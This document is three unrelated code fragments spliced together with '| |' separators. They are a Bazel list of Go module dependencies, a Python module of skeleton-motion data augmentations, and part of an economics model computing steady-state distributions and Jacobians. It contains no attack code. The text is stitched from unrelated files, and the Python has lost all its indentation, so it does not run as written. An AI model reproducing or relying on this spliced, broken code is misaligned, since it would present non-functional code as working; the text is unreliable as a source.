sum = "h1:Jm64b3bO9kP43ddLjL2EY3Io6bmy1qGb9Xxz6TqS6rc=",
version = "v1.1.22",
)
go_repository(
name = "com_github_mikefarah_yaml_v2",
importpath = "github.com/mikefarah/yaml/v2",
sum = "h1:eYqfooY0BnvKTJxr7+ABJs13n3dg9n347GScDaU2Lww=",
version = "v2.4.0",
)
go_repository(
name = "com_github_mikefarah_yq_v2",
importpath = "github.com/mikefarah/yq/v2",
sum = "h1:tajDonaFK6WqitSZExB6fKlWQy/yCkptqxh2AXEe3N4=",
version = "v2.4.1",
)
go_repository(
name = "com_github_minio_minio_go_v6",
importpath = "github.com/minio/minio-go/v6",
sum = "h1:bU4kIa/qChTLC1jrWZ8F+8gOiw1MClubddAJVR4gW3w=",
version = "v6.0.49",
)
go_repository(
name = "com_github_minio_sha256_simd",
importpath = "github.com/minio/sha256-simd",
sum = "h1:5QHSlgo3nt5yKOJrC7W8w7X+NFl8cMPZm96iu8kKUJU=",
version = "v0.1.1",
)
go_repository(
name = "com_github_mitchellh_cli",
importpath = "github.com/mitchellh/cli",
sum = "h1:iGBIsUe3+HZ/AD/Vd7DErOt5sU9fa8Uj7A2s1aggv1Y=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_copystructure",
importpath = "github.com/mitchellh/copystructure",
sum = "h1:Laisrj+bAB6b/yJwB5Bt3ITZhGJdqmxquMKeZ+mmkFQ=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_go_homedir",
importpath = "github.com/mitchellh/go-homedir",
sum = "h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y=",
version = "v1.1.0",
)
go_repository(
name = "com_github_mitchellh_go_testing_interface",
importpath = "github.com/mitchellh/go-testing-interface",
sum = "h1:fzU/JVNcaqHQEcVFAKeR41fkiLdIPrefOvVG1VZ96U0=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_go_wordwrap",
importpath = "github.com/mitchellh/go-wordwrap",
sum = "h1:6GlHJ/LTGMrIJbwgdqdl2eEH8o+Exx/0m8ir9Gns0u4=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_gox",
importpath = "github.com/mitchellh/gox",
sum = "h1:lfGJxY7ToLJQjHHwi0EX6uYBdK78egf954SQl13PQJc=",
version = "v0.4.0",
)
go_repository(
name = "com_github_mitchellh_hashstructure",
importpath = "github.com/mitchellh/hashstructure",
sum = "h1:hOY53G+kBFhbYFpRVxHl5eS7laP6B1+Cq+Z9Dry1iMU=",
version = "v0.0.0-20170609045927-2bca23e0e452",
)
go_repository(
name = "com_github_mitchellh_iochan",
importpath = "github.com/mitchellh/iochan",
sum = "h1:C+X3KsSTLFVBr/tK1eYN/vs4rJcvsiLU338UhYPJWeY=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mitchellh_mapstructure",
importpath = "github.com/mitchellh/mapstructure",
sum = "h1:fmNYVwqnSfB9mZU6OS2O6GsXM+wcskZDuKQzvN1EDeE=",
version = "v1.1.2",
)
go_repository(
name = "com_github_mitchellh_osext",
importpath = "github.com/mitchellh/osext",
sum = "h1:2+myh5ml7lgEU/51gbeLHfKGNfgEQQIWrlbdaOsidbQ=",
version = "v0.0.0-20151018003038-5e2d6d41470f",
)
go_repository(
name = "com_github_mitchellh_reflectwalk",
importpath = "github.com/mitchellh/reflectwalk",
sum = "h1:9D+8oIskB4VJBN5SFlmc27fSlIBZaov1Wpk/IfikLNY=",
version = "v1.0.0",
)
go_repository(
name = "com_github_moby_term",
importpath = "github.com/moby/term",
sum = "h1:aY7OQNf2XqY/JQ6qREWamhI/81os/agb2BAGpcx5yWI=",
version = "v0.0.0-20200312100748-672ec06f55cd",
)
go_repository(
name = "com_github_modern_go_concurrent",
importpath = "github.com/modern-go/concurrent",
sum = "h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=",
version = "v0.0.0-20180306012644-bacd9c7ef1dd",
)
go_repository(
name = "com_github_modern_go_reflect2",
importpath = "github.com/modern-go/reflect2",
sum = "h1:9f412s+6RmYXLWZSEzVVgPGK7C2PphHj5RJrvfx9AWI=",
version = "v1.0.1",
)
go_repository(
name = "com_github_morikuni_aec",
importpath = "github.com/morikuni/aec",
sum = "h1:nP9CBfwrvYnBRgY6qfDQkygYDmYwOilePFkwzv4dU8A=",
version = "v1.0.0",
)
go_repository(
name = "com_github_mozillazg_go_cos",
importpath = "github.com/mozillazg/go-cos",
sum = "h1:RylOpEESdWMLb13bl0ADhko12uMN3JmHqqwFu4OYGBY=",
version = "v0.13.0",
)
go_repository(
name = "com_github_mozillazg_go_httpheader",
importpath = "github.com/mozillazg/go-httpheader",
sum = "h1:geV7TrjbL8KXSyvghnFm+NyTux/hxwueTSrwhe88TQQ=",
version = "v0.2.1",
)
go_repository(
name = "com_github_munnerz_goautoneg",
importpath = "github.com/munnerz/goautoneg",
sum = "h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=",
version = "v0.0.0-20191010083416-a7dc8b61c822",
)
go_repository(
name = "com_github_mwitkow_go_conntrack",
importpath = "github.com/mwitkow/go-conntrack",
sum = "h1:KUppIJq7/+SVif2QVs3tOP0zanoHgBEVAwHxUSIzRqU=",
version = "v0.0.0-20190716064945-2f068394615f",
)
go_repository(
name = "com_github_mxk_go_flowrate",
importpath = "github.com/mxk/go-flowrate",
sum = "h1:y5//uYreIhSUg3J1GEMiLbxo1LJaP8RfCpH6pymGZus=",
version = "v0.0.0-20140419014527-cca7078d478f",
)
go_repository(
name = "com_github_nakagami_firebirdsql",
importpath = "github.com/nakagami/firebirdsql",
sum = "h1:P48LjvUQpTReR3TQRbxSeSBsMXzfK0uol7eRcr7VBYQ=",
version = "v0.0.0-20190310045651-3c02a58cfed8",
)
go_repository(
name = "com_github_ncw_swift",
importpath = "github.com/ncw/swift",
sum = "h1:4DQRPj35Y41WogBxyhOXlrI37nzGlyEcsforeudyYPQ=",
version = "v1.0.47",
)
go_repository(
name = "com_github_nvveen_gotty",
importpath = "github.com/Nvveen/Gotty",
sum = "h1:TngWCqHvy9oXAN6lEVMRuU21PR1EtLVZJmdB18Gu3Rw=",
version = "v0.0.0-20120604004816-cd527374f1e5",
)
go_repository(
name = "com_github_nxadm_tail",
importpath = "github.com/nxadm/tail",
sum = "h1:DQuhQpB1tVlglWS2hLQ5OV6B5r8aGxSrPc5Qo6uTN78=",
version = "v1.4.4",
)
go_repository(
name = "com_github_nytimes_gziphandler",
importpath = "github.com/NYTimes/gziphandler",
sum = "h1:ZUDjpQae29j0ryrS0u/B8HZfJBtBQHjqw2rQ2cqUQ3I=",
version = "v1.1.1",
)
go_repository(
name = "com_github_oklog_run",
importpath = "github.com/oklog/run",
sum = "h1:Ru7dDtJNOyC66gQ5dQmaCa0qIsAUFY3sFpK1Xk8igrw=",
version = "v1.0.0",
)
go_repository(
name = "com_github_oklog_ulid",
importpath = "github.com/oklog/ulid",
sum = "h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4=",
version = "v1.3.1",
)
go_repository(
name = "com_github_olekukonko_tablewriter",
importpath = "github.com/olekukonko/tablewriter",
sum = "h1:sq53g+DWf0J6/ceFUHpQ0nAEb6WgM++fq16MZ91cS6o=",
version = "v0.0.2",
)
go_repository(
name = "com_github_oneofone_xxhash",
importpath = "github.com/OneOfOne/xxhash",
sum = "h1:U68crOE3y3MPttCMQGywZOLrTeF5HHJ3/vDBCJn9/bA=",
version = "v1.2.6",
)
go_repository(
name = "com_github_onsi_ginkgo",
importpath = "github.com/onsi/ginkgo",
sum = "h1:mFwc4LvZ0xpSvDZ3E+k8Yte0hLOMxXUlP+yXtJqkYfQ=",
version = "v1.12.1",
)
go_repository(
name = "com_github_onsi_gomega",
importpath = "github.com/onsi/gomega",
sum = "h1:o0+MgICZLuZ7xjH7Vx6zS/zcu93/BEp1VwkIW1mEXCE=",
version = "v1.10.1",
)
go_repository(
name = "com_github_opencontainers_go_digest",
importpath = "github.com/opencontainers/go-digest",
sum = "h1:WzifXhOVOEOuFYOJAW6aQqW0TooG2iki3E3Ii+WN7gQ=",
version = "v1.0.0-rc1",
)
go_repository(
name = "com_github_opencontainers_image_spec",
importpath = "github.com/opencontainers/image-spec",
sum = "h1:yN8BPXVwMBAm3Cuvh1L5XE8XpvYRMdsVLd82ILprhUU=",
version = "v1.0.2-0.20190823105129-775207bd45b6",
)
go_repository(
name = "com_github_opencontainers_runc",
importpath = "github.com/opencontainers/runc",
sum = "h1:GlxAyO6x8rfZYN9Tt0Kti5a/cP41iuiO2yYT0IJGY8Y=",
version = "v0.1.1",
)
go_repository(
name = "com_github_opencontainers_runtime_spec",
importpath = "github.com/opencontainers/runtime-spec",
sum = "h1:eNUVfm/RFLIi1G7flU5/ZRTHvd4kcVuzfRnL6OFlzCI=",
version = "v0.1.2-0.20190507144316-5b71a03e2700",
)
go_repository(
name = "com_github_opencontainers_runtime_tools",
importpath = "github.com/opencontainers/runtime-tools",
sum = "h1:H7DMc6FAjgwZZi8BRqjrAAHWoqEr5e5L6pS4V0ezet4=",
version = "v0.0.0-20181011054405-1d69bd0f9c39",
)
go_repository(
name = "com_github_openshift_origin",
importpath = "github.com/openshift/origin",
sum = "h1:KLVRXtjLhZHVtrcdnuefaI2Bf182EEiTfEVDHokoyng=",
version = "v0.0.0-20160503220234-8f127d736703",
)
go_repository(
name = "com_github_openshift_prom_label_proxy",
importpath = "github.com/openshift/prom-label-proxy",
sum = "h1:GW8OxGwBbI2kCqjb5PQfVXRAuCJbYyX1RYs9R3ISjck=",
version = "v0.1.1-0.20191016113035-b8153a7f39f1",
)
go_repository(
name = "com_github_opentracing_basictracer_go",
importpath = "github.com/opentracing/basictracer-go",
sum = "h1:YyUAhaEfjoWXclZVJ9sGoNct7j4TVk7lZWlQw5UXuoo=",
version = "v1.0.0",
)
go_repository(
name = "com_github_opentracing_contrib_go_stdlib",
importpath = "github.com/opentracing-contrib/go-stdlib",
sum = "h1:QsgXACQhd9QJhEmRumbsMQQvBtmdS0mafoVEBplWXEg=",
version = "v0.0.0-20190519235532-cf7a6c988dc9",
)
go_repository(
name = "com_github_opentracing_opentracing_go",
importpath = "github.com/opentracing/opentracing-go",
sum = "h1:pWlfV3Bxv7k65HYwkikxat0+s3pV4bsqf19k25Ur8rU=",
version = "v1.1.0",
)
go_repository(
name = "com_github_openzipkin_zipkin_go",
importpath = "github.com/openzipkin/zipkin-go",
sum = "h1:yXiysv1CSK7Q5yjGy1710zZGnsbMUIjluWBxtLXHPBo=",
version = "v0.1.6",
)
go_repository(
name = "com_github_operator_framework_api",
importpath = "github.com/operator-framework/api",
sum = "h1:Rg+6sdgP7KMOUGNP83s+5gPo7IwTH3mZ85ZFml9SPXY=",
version = "v0.3.13",
)
go_repository(
name = "com_github_operator_framework_operator_registry",
importpath = "github.com/operator-framework/operator-registry",
sum = "h1:GH7essHnVRP4kYgAWYV9obsS0Cnaj/KjT3BmQXmKAOE=",
version = "v1.13.4",
)
go_repository(
name = "com_github_operator_framework_operator_sdk",
importpath = "github.com/operator-framework/operator-sdk",
sum = "h1:QI6k+WBDAXagx2OunEajQLa8LZwmRXu+x/SwmVZ/CCw=",
version = "v0.19.4",
)
go_repository(
name = "com_github_otiai10_copy",
importpath = "github.com/otiai10/copy",
sum = "h1:HvG945u96iNadPoG2/Ja2+AUJeW5YuFQMixq9yirC+k=",
version = "v1.2.0",
)
go_repository(
name = "com_github_otiai10_curr",
importpath = "github.com/otiai10/curr",
sum = "h1:TJIWdbX0B+kpNagQrjgq8bCMrbhiuX73M2XwgtDMoOI=",
version = "v1.0.0",
)
go_repository(
name = "com_github_otiai10_mint",
importpath = "github.com/otiai10/mint",
sum = "h1:BCmzIS3n71sGfHB5NMNDB3lHYPz8fWSkCAErHed//qc=",
version = "v1.3.1",
)
go_repository(
name = "com_github_pascaldekloe_goe",
importpath = "github.com/pascaldekloe/goe",
sum = "h1:cBOtyMzM9HTpWjXfbbunk26uA6nG3a8n06Wieeh0MwY=",
version = "v0.1.0",
)
go_repository(
name = "com_github_pborman_uuid",
importpath = "github.com/pborman/uuid",
sum = "h1:J7Q5mO4ysT1dv8hyrUGHb9+ooztCXu1D8MY8DZYsu3g=",
version = "v1.2.0",
)
go_repository(
name = "com_github_pelletier_go_toml",
importpath = "github.com/pelletier/go-toml",
sum = "h1:T5zMGML61Wp+FlcbWjRDT7yAxhJNAiPPLOFECq181zc=",
version = "v1.2.0",
)
go_repository(
name = "com_github_peterbourgon_diskv",
importpath = "github.com/peterbourgon/diskv",
sum = "h1:UBdAOUP5p4RWqPBg048CAvpKN+vxiaj6gdUUzhl4XmI=",
version = "v2.0.1+incompatible",
)
go_repository(
name = "com_github_phayes_freeport",
importpath = "github.com/phayes/freeport",
sum = "h1:JhzVVoYvbOACxoUmOs6V/G4D5nPVUW73rKvXxP4XUJc=",
version = "v0.0.0-20180830031419-95f893ade6f2",
)
go_repository(
name = "com_github_pierrec_lz4",
importpath = "github.com/pierrec/lz4",
sum = "h1:2xWsjqPFWcplujydGg4WmhC/6fZqK42wMM8aXeqhl0I=",
version = "v2.0.5+incompatible",
)
go_repository(
name = "com_github_pkg_errors",
importpath = "github.com/pkg/errors",
sum = "h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=",
version = "v0.9.1",
)
go_repository(
name = "com_github_pmezard_go_difflib",
importpath = "github.com/pmezard/go-difflib",
sum = "h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=",
version = "v1.0.0",
)
go_repository(
name = "com_github_posener_complete",
importpath = "github.com/posener/complete",
sum = "h1:ccV59UEOTzVDnDUEFdT95ZzHVZ+5+158q8+SJb2QV5w=",
version = "v1.1.1",
)
go_repository(
name = "com_github_pquerna_cachecontrol",
importpath = "github.com/pquerna/cachecontrol",
sum = "h1:0XM1XL/OFFJjXsYXlG30spTkV/E9+gmd5GD1w2HE8xM=",
version = "v0.0.0-20171018203845-0dec1b30a021",
)
go_repository(
name = "com_github_prometheus_alertmanager",
importpath = "github.com/prometheus/alertmanager",
sum = "h1:PBMNY7oyIvYMBBIag35/C0hO7xn8+35p4V5rNAph5N8=",
version = "v0.20.0",
)
go_repository(
name = "com_github_prometheus_client_golang",
importpath = "github.com/prometheus/client_golang",
sum = "h1:NTGy1Ja9pByO+xAeH/qiWnLrKtr3hJPNjaVUwnjpdpA=",
version = "v1.7.1",
)
go_repository(
name = "com_github_prometheus_client_model",
importpath = "github.com/prometheus/client_model",
sum = "h1:uq5h0d+GuxiXLJLNABMgp2qUWDPiLvgCzz2dUR+/W/M=",
version = "v0.2.0",
)
go_repository(
name = "com_github_prometheus_common",
importpath = "github.com/prometheus/common",
sum = "h1:RyRA7RzGXQZiW+tGMr7sxa85G1z0yOpM1qq5c8lNawc=",
version = "v0.10.0",
)
go_repository(
name = "com_github_prometheus_procfs",
importpath = "github.com/prometheus/procfs",
sum = "h1:F0+tqvhOksq22sc6iCHF5WGlWjdwj92p0udFh1VFBS8=",
version = "v0.1.3",
)
go_repository(
name = "com_github_prometheus_prometheus",
importpath = "github.com/prometheus/prometheus",
sum = "h1:EekL1S9WPoPtJL2NZvL+xo38iMpraOnyEHOiyZygMDY=",
version = "v2.3.2+incompatible",
)
go_repository(
name = "com_github_prometheus_tsdb",
importpath = "github.com/prometheus/tsdb",
sum = "h1:YZcsG11NqnK4czYLrWd9mpEuAJIHVQLwdrleYfszMAA=",
version = "v0.7.1",
)
go_repository(
name = "com_github_puerkitobio_purell",
importpath = "github.com/PuerkitoBio/purell",
sum = "h1:WEQqlqaGbrPkxLJWfBwQmfEAE1Z7ONdDLqrN38tNFfI=",
version = "v1.1.1",
)
go_repository(
name = "com_github_puerkitobio_urlesc",
importpath = "github.com/PuerkitoBio/urlesc",
sum = "h1:d+Bc7a5rLufV/sSk/8dngufqelfh6jnri85riMAaF/M=",
version = "v0.0.0-20170810143723-de5bf2ad4578",
)
go_repository(
name = "com_github_rcrowley_go_metrics",
importpath = "github.com/rcrowley/go-metrics",
sum = "h1:9ZKAASQSHhDYGoxY8uLVpewe1GDZ2vu2Tr/vTdVAkFQ=",
version = "v0.0.0-20181016184325-3113b8401b8a",
)
go_repository(
name = "com_github_remyoudompheng_bigfft",
importpath = "github.com/remyoudompheng/bigfft",
sum = "h1:/NRJ5vAYoqz+7sG51ubIDHXeWO8DlTSrToPu6q11ziA=",
version = "v0.0.0-20170806203942-52369c62f446",
)
go_repository(
name = "com_github_robfig_cron",
importpath = "github.com/robfig/cron",
sum = "h1:NZInwlJPD/G44mJDgBEMFvBfbv/QQKCrpo+az/QXn8c=",
version = "v0.0.0-20170526150127-736158dc09e1",
)
go_repository(
name = "com_github_rogpeppe_fastuuid",
importpath = "github.com/rogpeppe/fastuuid",
sum = "h1:Ppwyp6VYCF1nvBTXL3trRso7mXMlRrw9ooo375wvi2s=",
version = "v1.2.0",
)
go_repository(
| |
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/11/17 19:51
# @Author : Jun
import random
import numpy as np
import math
from math import sin, cos
import random
import torch
from torch import nn
import torch.nn.functional as F
def aug_look(name, args1=None, args2=None):
if 'selectFrames' in name:
return SelectFrames(args1)
# elif 'normalizeC' == name:
# return NormalizeC(args1, args2)
# elif 'normalizeCV' == name:
# return NormalizeCV(args1, args2)
elif 'subtract' in name:
return Subtract(args1)
# elif 'subsample' in name:
# return Subsample(args1) # subsample(data_numpy, time_range)
elif 'randomFlip' in name:
# return RandomHorizontalFlip(args1) # subSampleFlip(data_numpy, time_range)
return RandomHorizontalFlip() # subSampleFlip(data_numpy, time_range)
elif 'zeroOutAxis' in name:
return Zero_out_axis(args1) # zero_out_axis(data_numpy, axis)
# elif 'diffOnAxis' in name:
# return Diff_on_axis(args1) # diff_on_axis(data_numpy, axis)
elif 'rotate' in name:
return Rotate(args1, args2) # rotate(data_numpy, axis, angle)
elif 'zeroOutJoints' in name:
return Zero_out_joints(args1, args2) # zero_out_joints(data_numpy, joint_list, time_range)
elif 'gausNoise' in name:
# return Gaus_noise( args1, args2) # gaus_noise(data_numpy, mean= 0, std = 0.01)
return Gaus_noise() # gaus_noise(data_numpy, mean= 0, std = 0.01)
elif 'gausFilter' in name:
# return Gaus_filter(args1, args2) # gaus_filter(data_numpy)
return Gaus_filter() # gaus_filter(data_numpy)
elif 'shear' in name:
return Shear(args1, args2)
# elif name == 'diff':
# return Diff()
else:
raise IndentationError("wrong")
class NormalizeC(object):
def __init__(self, mean, std, inplace=False):
self.mean = mean
self.std = std
self.inplace = inplace
def __call__(self, tensor):
if not self.inplace:
tensor = tensor.clone()
dtype = tensor.dtype
mean = torch.as_tensor(self.mean, dtype=dtype, device=tensor.device)
std = torch.as_tensor(self.std, dtype=dtype, device=tensor.device)
tensor.sub_(mean[:, None, None]).div_(std[:, None, None])
return tensor
class NormalizeCV(object):
def __init__(self, mean, std, inplace=False):
self.mean = mean
self.std = std
self.inplace = inplace
def __call__(self, tensor):
if not self.inplace:
tensor = tensor.clone()
dtype = tensor.dtype
self.mean = torch.as_tensor(self.mean, dtype=dtype, device=tensor.device)
self.std = torch.as_tensor(self.std, dtype=dtype, device=tensor.device)
out = (tensor - self.mean) / self.std
return out
# numpy
class Skeleton2Image(object):
def __call__(self, data_numpy):
C, T, V, M = data_numpy.shape
data = data_numpy.reshape(C, T, V * M)
return data
# tensor
class Image2skeleton(object):
def __call__(self, tensor):
C, T, W = tensor.size()
return tensor.view(C, T, 25, 2)
class SelectFrames(object):
def __init__(self, frames):
self.frames = frames
def __call__(self, data_numpy):
return data_numpy[:, :self.frames, :, :]
class ToTensor(object):
def __call__(self, data_numpy):
return torch.from_numpy(data_numpy)
class Subtract(object):
def __init__(self, joint=None):
if joint == None:
self.joint = random.randint(0, 24)
else:
self.joint = joint
def __call__(self, data_numpy):
C, T, V, M = data_numpy.shape
x_new = np.zeros((C, T, V, M))
for i in range(V):
x_new[:, :, i, :] = data_numpy[:, :, i, :] - data_numpy[:, :, self.joint, :]
return x_new
class Subsample(object):
def __init__(self, time_range=None):
self.time_range = time_range
def __call__(self, data_numpy):
C, T, V, M = data_numpy.shape
# frames = random.randint(1, T)
if self.time_range == None:
self.time_range = random.randint(1, T)
all_frames = [i for i in range(T)]
time_range_list = random.sample(all_frames, self.time_range)
time_range_list.sort()
x_new = np.zeros((C, T, V, M))
x_new[:, time_range_list, :, :] = data_numpy[:, time_range_list, :, :]
return x_new
class Zero_out_axis(object):
def __init__(self, axis=None):
self.first_axis = axis
def __call__(self, data_numpy):
if self.first_axis != None:
axis_next = self.first_axis
else:
axis_next = random.randint(0, 2)
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
x_new = np.zeros((T, V, M))
temp[axis_next] = x_new
return temp
class Diff_on_axis(object):
def __init__(self, axis=None):
self.first_axis = axis
def __call__(self, data_numpy):
if self.first_axis != None:
axis_next = self.first_axis
else:
axis_next = random.randint(0, 2)
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
for t in range(T - 1):
temp[axis_next, t, :, :] = data_numpy[axis_next, t + 1, :, :] - data_numpy[axis_next, t, :, :]
temp[axis_next, -1, :, :] = np.zeros((V, M))
return temp
class RandomHorizontalFlip(object):
def __init__(self, p=0.5):
self.p = p
def __call__(self, data_numpy):
C, T, V, M = data_numpy.shape
if random.random() < self.p:
time_range_order = [i for i in range(T)]
time_range_reverse = list(reversed(time_range_order))
return data_numpy[:, time_range_reverse, :, :]
else:
return data_numpy.copy()
class Rotate(object):
def __init__(self, axis=None, angle=None, ):
self.first_axis = axis
self.first_angle = angle
def __call__(self, data_numpy):
if self.first_axis != None:
axis_next = self.first_axis
else:
axis_next = random.randint(0, 2)
if self.first_angle != None:
if isinstance(self.first_angle, list):
angle_big = self.first_angle[0] + self.first_angle[1]
angle_small = self.first_angle[0] - self.first_angle[1]
angle_next = random.uniform(angle_small, angle_big)
else:
angle_next = self.first_angle
else:
# angle_list = [0, 90, 180, 270]
# angle_next = random.sample(angle_list, 1)[0]
angle_next = random.uniform(0, 30)
temp = data_numpy.copy()
angle = math.radians(angle_next)
# x
if axis_next == 0:
R = np.array([[1, 0, 0],
[0, cos(angle), sin(angle)],
[0, -sin(angle), cos(angle)]])
# y
if axis_next == 1:
R = np.array([[cos(angle), 0, -sin(angle)],
[0, 1, 0],
[sin(angle), 0, cos(angle)]])
# z
if axis_next == 2:
R = np.array([[cos(angle), sin(angle), 0],
[-sin(angle), cos(angle), 0],
[0, 0, 1]])
R = R.transpose()
temp = np.dot(temp.transpose([1, 2, 3, 0]), R)
temp = temp.transpose(3, 0, 1, 2)
return temp
class Zero_out_joints(object):
def __init__(self, joint_list=None, time_range=None):
self.first_joint_list = joint_list
self.first_time_range = time_range
def __call__(self, data_numpy):
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
if self.first_joint_list != None:
if isinstance(self.first_joint_list, int):
all_joints = [i for i in range(V)]
joint_list_ = random.sample(all_joints, self.first_joint_list)
joint_list_ = sorted(joint_list_)
else:
joint_list_ = self.first_joint_list
else:
random_int = random.randint(5, 15)
all_joints = [i for i in range(V)]
joint_list_ = random.sample(all_joints, random_int)
joint_list_ = sorted(joint_list_)
if self.first_time_range != None:
if isinstance(self.first_time_range, int):
all_frames = [i for i in range(T)]
time_range_ = random.sample(all_frames, self.first_time_range)
time_range_ = sorted(time_range_)
else:
time_range_ = self.first_time_range
else:
if T < 100:
random_int = random.randint(20, 50)
else:
random_int = random.randint(50, 100)
all_frames = [i for i in range(T)]
time_range_ = random.sample(all_frames, random_int)
time_range_ = sorted(time_range_)
x_new = np.zeros((C, len(time_range_), len(joint_list_), M))
# print("data_numpy",data_numpy[:, time_range, joint_list, :].shape)
temp2 = temp[:, time_range_, :, :].copy()
temp2[:, :, joint_list_, :] = x_new
temp[:, time_range_, :, :] = temp2
return temp
class Gaus_noise(object):
def __init__(self, mean=0, std=0.05):
self.mean = mean
self.std = std
def __call__(self, data_numpy):
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
noise = np.random.normal(self.mean, self.std, size=(C, T, V, M))
return temp + noise
class Gaus_filter(object):
def __init__(self, kernel=15, sig_list=[0.1, 2]):
self.g = GaussianBlurConv(3, kernel, sig_list)
def __call__(self, data_numpy):
return self.g(data_numpy)
class Shear(object):
def __init__(self, s1=None, s2=None):
self.s1 = s1
self.s2 = s2
def __call__(self, data_numpy):
temp = data_numpy.copy()
if self.s1 != None:
s1_list = self.s1
else:
s1_list = [random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1)]
# print(s1_list[0])
if self.s2 != None:
s2_list = self.s2
else:
s2_list = [random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1)]
R = np.array([[1, s1_list[0], s2_list[0]],
[s1_list[1], 1, s2_list[1]],
[s1_list[2], s2_list[2], 1]])
R = R.transpose()
temp = np.dot(temp.transpose([1, 2, 3, 0]), R)
temp = temp.transpose(3, 0, 1, 2)
return temp
class Diff(object):
def __call__(self, data_numpy):
C, T, V, M = data_numpy.shape
x_new = np.zeros((C, T, V, M))
for t in range(T - 1):
x_new[:, t, :, :] = data_numpy[:, t + 1, :, :] - data_numpy[:, t, :, :]
return x_new
'''========================================================'''
# ok
def subtract(data_numpy, joint):
C, T, V, M = data_numpy.shape
x_new = np.zeros((C, T, V, M))
for i in range(V):
x_new[:, :, i, :] = data_numpy[:, :, i, :] - data_numpy[:, :, joint, :]
return x_new
# ok
# b: crop and resize
def subsample(data_numpy, time_range):
C, T, V, M = data_numpy.shape
if isinstance(time_range, int):
all_frames = [i for i in range(T)]
time_range = random.sample(all_frames, time_range)
time_range.sort()
x_new = np.zeros((C, T, V, M))
x_new[:, time_range, :, :] = data_numpy[:, time_range, :, :]
return x_new
# ok
# c: crop,resize (and flip)
def subSampleFlip(data_numpy, time_range):
C, T, V, M = data_numpy.shape
assert T >= time_range, "frames longer than data"
if isinstance(time_range, int):
all_frames = [i for i in range(T)]
time_range = random.sample(all_frames, time_range)
time_range_order = sorted(time_range)
time_range_reverse = list(reversed(time_range_order))
x_new = np.zeros((C, T, V, M))
x_new[:, time_range_order, :, :] = data_numpy[:, time_range_reverse, :, :]
return x_new
# ok
# d: color distort.(drop)
def zero_out_axis(data_numpy, axis):
# x, y, z -> axis : 0,1,2
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
x_new = np.zeros((T, V, M))
temp[axis] = x_new
return temp
# ok
# e: color distort. (jitter)
def diff_on_axis(data_numpy, axis):
temp = data_numpy.copy()
C, T, V, M = data_numpy.shape
for t in range(T - 1):
temp[axis, t, :, :] = data_numpy[axis, t + 1, :, :] - data_numpy[axis, t, :, :]
temp[axis, -1, :, :] = np.zeros((V, M))
return temp
# ok
# f: rotate
def rotate(data_numpy, axis, angle):
temp = data_numpy.copy()
angle = math.radians(angle)
| |
: [optional] int
maximum number of iterations, if 'tol' not reached by then, raise error
D_seed : [optional] array
initial seed for overall distribution
pi_seed : [optional] array
initial seed for stationary dist of Pi, if no D_seed
Returns
----------
D : array
steady-state distribution
"""
# first obtain initial distribution D
if D_seed is None:
# compute stationary distribution for exogenous variable
pi = utils.stationary(Pi, pi_seed)
# now initialize full distribution with this, assuming uniform distribution on endogenous vars
endogenous_dims = [grid[k].shape[0] for k in self.policy]
D = np.tile(pi, endogenous_dims[::-1] + [1]).T / np.prod(endogenous_dims)
else:
D = D_seed
# obtain interpolated policy rule for each dimension of endogenous policy
sspol_i = {}
sspol_pi = {}
for pol in self.policy:
# use robust binary search-based method that only requires grids, not policies, to be monotonic
sspol_i[pol], sspol_pi[pol] = utils.interpolate_coord_robust(grid[pol], sspol[pol])
# iterate until convergence by tol, or maxit
Pi_T = Pi.T.copy()
for it in range(maxit):
Dnew = self.forward_step(D, Pi_T, sspol_i, sspol_pi)
# only check convergence every 10 iterations for efficiency
if it % 10 == 0 and utils.within_tolerance(D, Dnew, tol):
break
D = Dnew
else:
raise ValueError(f'No convergence after {maxit} forward iterations!')
return D
'''Part 4: components of jac(), corresponding to *4 steps of fake news algorithm* in paper
- Step 1: backward_step_fakenews and backward_iteration_fakenews to get curlyYs and curlyDs
- Step 2: forward_iteration_fakenews to get curlyPs
- Step 3: build_F to get fake news matrix from curlyYs, curlyDs, curlyPs
- Step 4: J_from_F to get Jacobian from fake news matrix
'''
def backward_step_fakenews(self, din_dict, output_list, ssin_dict, ssout_list,
Dss, Pi_T, sspol_i, sspol_pi, sspol_space, h=1E-4):
# shock perturbs outputs
shocked_outputs = {k: v for k, v in zip(self.all_outputs_order,
utils.numerical_diff(self.back_step_fun, ssin_dict, din_dict, h,
ssout_list))}
curlyV = {k: shocked_outputs[k] for k in self.backward}
# which affects the distribution tomorrow
pol_pi_shock = {k: -shocked_outputs[k]/sspol_space[k] for k in self.policy}
curlyD = self.forward_step_shock(Dss, Pi_T, sspol_i, sspol_pi, pol_pi_shock)
# and the aggregate outcomes today
curlyY = {k: np.vdot(Dss, shocked_outputs[k]) for k in output_list}
return curlyV, curlyD, curlyY
def backward_iteration_fakenews(self, input_shocked, output_list, ssin_dict, ssout_list, Dss, Pi_T,
sspol_i, sspol_pi, sspol_space, T, h=1E-4, ss_for_hetinput=None):
"""Iterate policy steps backward T times for a single shock."""
if self.hetinput is not None and input_shocked in self.hetinput_inputs:
# if input_shocked is an input to hetinput, take numerical diff to get response
din_dict = dict(zip(self.hetinput_outputs_order,
utils.numerical_diff_symmetric(self.hetinput, ss_for_hetinput, {input_shocked: 1}, h)))
else:
# otherwise, we just have that one shock
din_dict = {input_shocked: 1}
# contemporaneous response to unit scalar shock
